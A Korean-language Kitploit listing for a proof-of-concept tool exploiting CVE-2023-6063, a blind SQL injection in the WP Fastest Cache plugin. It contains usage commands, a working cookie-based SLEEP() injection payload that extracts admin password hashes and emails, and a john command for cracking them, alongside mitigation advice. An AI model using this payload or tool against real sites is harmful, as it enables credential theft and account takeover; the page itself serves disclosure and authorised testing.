Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-6063-PoC — CVE-2023-6063에 대한 개념 증명, WP Fastest Cache ≤1.2.2의 시간 기반 블라인드 SQL 인젝션 취약점. | Kitploit
도구/GitHubGitHub/incommatose/cve-2023-6063-poc
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

CVE-2023-6063에 대한 개념 증명, WP Fastest Cache ≤1.2.2의 시간 기반 블라인드 SQL 인젝션 취약점.

저장소 보기
21391년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-6063 PoC: WP Fastest Cache 1.2.2 인증되지 않은 블라인드 SQL 인젝션

Static Badge Static Badge Static Badge

CVE-2023-6063에 대한 PoC(Proof of Concept)로, WP Fastest Cache ≤1.2.2의 시간 기반 블라인드 SQL 인젝션 취약점입니다. wordpress_logged_in 쿠키를 악용하여 wp_users 테이블에서 해시된 비밀번호(user_pass)와 이메일(user_email)을 추출합니다.

기능

  • SLEEP() 지연을 통한 시간 기반 데이터 추출 (문자 단위)
  • 사용자 정의 쿠키, 대상 사용자 이름, 해시 검증 지원

이 스크립트는 다음을 추출합니다:

  • ☑️ WordPress 비밀번호 해시 (MD5/PHPass)
  • ☑️ 연결된 이메일 주소
  • 유연한 테스트를 위한 CLI 인자 (--just-hash, --just-email, --debug)

사용법

종속성 설치 (설치되지 않은 경우):

root@kitploit:~
pip install -r requirements.txt

기본 사용법:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

전체 옵션:

root@kitploit:~
  -h, --help            도움말 메시지를 표시하고 종료합니다
  -u URL, --url URL     CVE-2023-6063 테스트를 위한 WordPress 전체 URL
  --username USERNAME   해시된 비밀번호를 추출할 사용자 정의
  -d DELAY, --delay DELAY
                        웹 응답 대기 시간 (기본값 5, 최소 2)
  -H HASH, --hash HASH  wp_users 테이블에 대해 검증할 해시, 해시에 특수 문자가 포함된 경우 작은따옴표 사용 -> '<hash>'
  --domain DOMAIN       이메일 검증을 위한 도메인 이름
  -c COOKIE, --cookie COOKIE
                        컨텍스트에서 다른 경우 쿠키 이름 지정
  --status-code STATUS_CODE
                        특정 긍정 상태 코드 사용, 기본값 200
  --debug               더 자세한 출력
  --just-hash           해시된 비밀번호만 추출
  --just-email          사용자의 이메일 값만 추출

💻 데모

관리자 사용자를 위한 데모입니다

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

해시된 비밀번호가 유출된 경우, 취약한 비밀번호라면 PHPass 알고리즘으로 복호화하기 위해 john 또는 hashcat을 사용하세요.

John 예시:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ 기술 세부 사항

📖 취약점 설명

WordPress용 WP Fastest Cache 플러그인(≤1.2.2)은 wordpress_logged_in 쿠키를 통해 인증되지 않은 블라인드 SQL 인젝션에 취약합니다. 공격자는 SQL 쿼리에서 시간 기반 지연(SLEEP())을 이용하여 wp_users 테이블에서 민감한 데이터(예: 비밀번호 해시, 이메일 주소)를 추출할 수 있습니다.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 면책 조항: 이 정보는 적절한 승인을 받은 윤리적 보안 테스트 목적으로만 사용하십시오. 무단 악용은 불법입니다.

  • CVE ID: CVE-2023-6063
  • 취약점 점수: 7.5 (높음)
  • 취약점 유형: SQL 인젝션 (블라인드, 시간 기반)
  • 영향 받는 소프트웨어: WP Fastest Cache (WordPress 플러그인) ≤ v1.2.2

🔍 공격 벡터

  • 악용 가능성: 원격 (인증 불필요)
  • 공격 복잡도: 낮음 (조작된 HTTP 요청을 통해 악용 가능)

🔥 영향:

  • 기밀성: 높음 (관리자 자격 증명 유출)
  • 무결성: 없음
  • 가용성: 없음

📌 영향을 받는 버전

  • WP Fastest Cache 버전 ≤1.2.2

🛡️ 완화

WP Fastest Cache를 버전 >1.2.2로 업그레이드하세요.

  • WP Fastest Cache v1.2.3 이상으로 업그레이드하세요.
  • 쿠키의 SQLi 페이로드를 차단하는 WAF 규칙을 적용하세요.
  • 사용하지 않으면 플러그인을 비활성화하세요.

📚 참고 자료

  • NIST NVD 항목
  • WordPress 플러그인 권고
  • CVE 세부 정보

⚖️ 법적 고지

  • 이 스크립트는 교육 목적으로만 제공됩니다. 테스트 전에 항상 명시적 허가를 받으십시오.
도구 다운로드